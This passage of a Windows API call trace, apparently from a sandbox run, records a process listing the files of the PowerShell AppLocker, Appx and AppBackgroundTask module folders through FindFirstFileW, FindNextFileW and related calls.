lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0198.795] FindClose (in: hFindFile=0x2386d70a6d0 | out: hFindFile=0x2386d70a6d0) returned 1 [0198.795] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0198.795] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xafa508da00, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0198.796] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d709590 [0198.796] FindNextFileW (in: hFindFile=0x2386d709590, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.796] FindNextFileW (in: hFindFile=0x2386d709590, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0198.796] FindNextFileW (in: hFindFile=0x2386d709590, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0198.796] FindClose (in: hFindFile=0x2386d709590 | out: hFindFile=0x2386d709590) returned 1 [0198.796] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xafa508da00, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0198.796] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d709650 [0198.797] FindNextFileW (in: hFindFile=0x2386d709650, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.797] FindNextFileW (in: hFindFile=0x2386d709650, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0198.797] FindNextFileW (in: hFindFile=0x2386d709650, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0198.797] FindClose (in: hFindFile=0x2386d709650 | out: hFindFile=0x2386d709650) returned 1 [0198.797] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xafa508dae0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0198.797] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0xafa508e010 | out: lpFileInformation=0xafa508e010*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0198.797] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xafa508da60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0198.798] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0xafa508dc90 | out: lpFindFileData=0xafa508dc90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d7097d0 [0198.798] FindNextFileW (in: hFindFile=0x2386d7097d0, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.798] FindNextFileW (in: hFindFile=0x2386d7097d0, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0198.798] FindNextFileW (in: hFindFile=0x2386d7097d0, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0198.798] FindClose (in: hFindFile=0x2386d7097d0 | out: hFindFile=0x2386d7097d0) returned 1 [0198.798] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0198.799] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xafa508da00, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0198.799] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d709f50 [0198.799] FindNextFileW (in: hFindFile=0x2386d709f50, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.799] FindNextFileW (in: hFindFile=0x2386d709f50, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0198.799] FindNextFileW (in: hFindFile=0x2386d709f50, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0198.799] FindNextFileW (in: hFindFile=0x2386d709f50, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0198.799] FindNextFileW (in: hFindFile=0x2386d709f50, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0198.800] FindNextFileW (in: hFindFile=0x2386d709f50, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0198.800] FindClose (in: hFindFile=0x2386d709f50 | out: hFindFile=0x2386d709f50) returned 1 [0198.800] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xafa508da00, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0198.800] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d70a850 [0198.800] FindNextFileW (in: hFindFile=0x2386d70a850, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.800] FindNextFileW (in: hFindFile=0x2386d70a850, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0198.800] FindNextFileW (in: hFindFile=0x2386d70a850, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0198.800] FindNextFileW (in: hFindFile=0x2386d70a850, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0198.801] FindNextFileW (in: hFindFile=0x2386d70a850, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0198.801] FindNextFileW (in: hFindFile=0x2386d70a850, lpFindFileData=0xafa508dbf0 | out: lpFindFileData=0xafa508dbf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0198.801] FindClose (in: hFindFile=0x2386d70a850 | out: hFindFile=0x2386d70a850) returned 1 [0198.801] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xafa508dae0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0198.801] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0xafa508e010 | out: lpFileInformation=0xafa508e010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0198.801] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xafa508da60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0198.801] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0xafa508dc90 | out: lpFindFileData=0xafa508dc90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d70a970 [0198.802] FindNextFileW (in: hFindFile=0x2386d70a970, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.802] FindNextFileW (in: hFindFile=0x2386d70a970, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0198.802] FindNextFileW (in: hFindFile=0x2386d70a970, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0198.802] FindNextFileW (in: hFindFile=0x2386d70a970, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0198.802] FindNextFileW (in: hFindFile=0x2386d70a970, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0198.802] FindNextFileW (in: hFindFile=0x2386d70a970, lpFindFileData=0xafa508dc50 | out: lpFindFileData=0xafa508dc50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0198.802] FindClose (in: hFindFile=0x2386d70a970 | out: hFindFile=0x2386d70a970) returned 1 [0198.802] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0198.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 